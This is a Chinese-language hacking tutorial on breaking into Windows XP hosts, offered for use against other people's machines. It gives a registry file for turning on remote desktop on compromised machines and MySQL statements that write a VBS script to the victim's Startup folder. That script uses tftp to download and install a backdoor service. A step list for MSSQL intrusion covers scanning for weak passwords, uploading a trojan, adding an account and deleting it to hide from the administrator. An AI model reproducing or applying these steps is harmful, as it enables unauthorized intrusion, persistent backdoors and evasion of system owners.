入侵Win XP的秘笈

xp攻略
windows xp 是微软的拳头产品,入侵xp一向来都是很困难,但并不是不能入侵,
只是xp的安全性相对于windows其它糸列好些罢了,下面是xp的一些基本特点:
1)xp的ipc$命名管道默认是guest用户权限登陆,并且密码不能为空,可以通过mmc
根节点管理单元去修改,充许任何用户权限登陆,但需桌面交互,和获得管理员权限.

2)xp自带的远桌面连接(3389终端),安装时默认已经安装和启动,但要远程连接,还
需做一步功夫,最简单的方法远程修改注册表(这种方法好处在于不用桌面交互),当
然你也可以用slave等远程桌面管理软件来开启,但这样风险要大一些,你总不能让
管理员看到桌面的鼠标到处乱窜吧.下面给出注册表修改方法:
新建一注册表文件,内容为:
regedit4 (一定要大写)

[hkey_local_machine\system\currentcontrolset\control\terminal serve]
"fdenytsconnections"=dword:00000000
假如把上面的注册表文件存为3389.reg,把3389.reg上传到肉机执行regedit /s 3389.reg
,这样就可以远程连接了,其实用fc方法你还可得到更多破解xp限制的方法,我和大家一
样,太懒了.

3)xp并不是一个标准的多用户糸统,同一时间只能充许一个用户连接和登陆,建义使用
system权限进入xp主机(基本上所有的木马程序都是用system权限登陆的),所以通过各种
方法入侵xp主机后的第一步并不是添加一个用户名,而是上传一个木马程序更为实际.
因为在没有开启终端或仿真终端的情况下,就算告诉你一台xp主机的用户和密码,你可能亦无
可奈何,随非你自已用来攻击的攻击平台是win98+winxp双重启动,才有能实现.

4)xp的自动更新功能,令人头痛.win2k的入侵在一定的程度上是利用了管理员的疏忽和懒惰
面xp却填补了这一点,在线自动更产功能会第一时间自动更新xp的新漏洞,如win2k的webdav
漏洞,已出了很久的一段时间了,而还有这个漏洞的主机"大大的有",连国内一个大型的门户网
站的新闻网这个漏洞现在还没补上,而上星期出的针对xp英文版的perl代码溢出漏洞你到国外
网站看看,还有几台有这个漏洞的主机,这就是xp在线更新功能的强悍这处.

5)xp自带防火墙

6)xp中的仿真终端服务启动后默认为ntlm验证,可以用xp自带的tlntadmn命令开启远程主机的telnet
仿真终端服务,而shutdown命令可以关闭远程主机,sc命令也以配置远程服务......,这些是xp自带的小
工具

7)想映射和共享xp的硬盘,随非你在对方的本地安全策略中把带有拒绝的字元册掉.

8)ca 已经过时了

9)讲得太多了,下面是一些xp的经典入侵手法,有些地方本人改良改良,如有雷同纯属巧合.

mysql入侵
在mysql入侵中我用到了hotmail的 wineggdropshell v1.35,本人认为是众我版本中最稳定的版本
为了方便输入我把它改名win135.exe
[1]用mysql连接你拥有用户名和密码的远程mysql数库.
[2]新建一个数据表后,安格式把下面两行语句写到新建的数据表中假如你新建的数据表为aa,
(1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");
(2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)");

上面的语句是利用脚本调用dos命令中的条件命令,意思是:从tftp服务器下载win135.exe 如果成功就安装win135服务其它退出
如果安装win135服务成功就启动win135服务,其它退出.注意,第二条语句比较长,但不要把第二条语句包含的几条命令分开处理
如果分开处理就会出现win135还没下载下来就执行其它命令这样会出错误,你可以用脚本新建一用户名,但没用的,因为有xp的用
户名并不一定能登陆,本脚本的好处在于能自动下载木马程序并运行,只要对方重启,你就可以用木马的system权限登陆以方主机
再下载3389.reg用regedit /s 3389.reg开启对方的3389,新建用户名后用3389登陆,至于怎样令xp重启就不用我说了吧,另外你的tftp服务器要保证在线
[3]把新建的数据表为脚本文件并导出到启动项:
select * from aa into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\aa.vbs";
[4]保存成功后,只要对方重启你就可以用木马登陆了

mssql入侵,最经典不过了
[1]扫描1433端口开放的主机,用raptor制作一个纯ip文本
[2]导入scanner扫描开放5000端口的主机
[3]把开放5000端口的主机再制作一个纯ip文本
[4]导入x-scan中扫描mssql弱口令
[5]用sqlexec连接带有弱口令的主机
[6]用tftp上传木马
[7]用木马的system权限登陆后,再上传3389.reg
[8]用regedit /s 3389.reg 命令开启终端
[9]建一用户名后,可以用3389客户端登陆了
[10]用3389登陆后.别忘了册掉新建的用户,因为xp登陆对话框中会把新建的用户显示出来.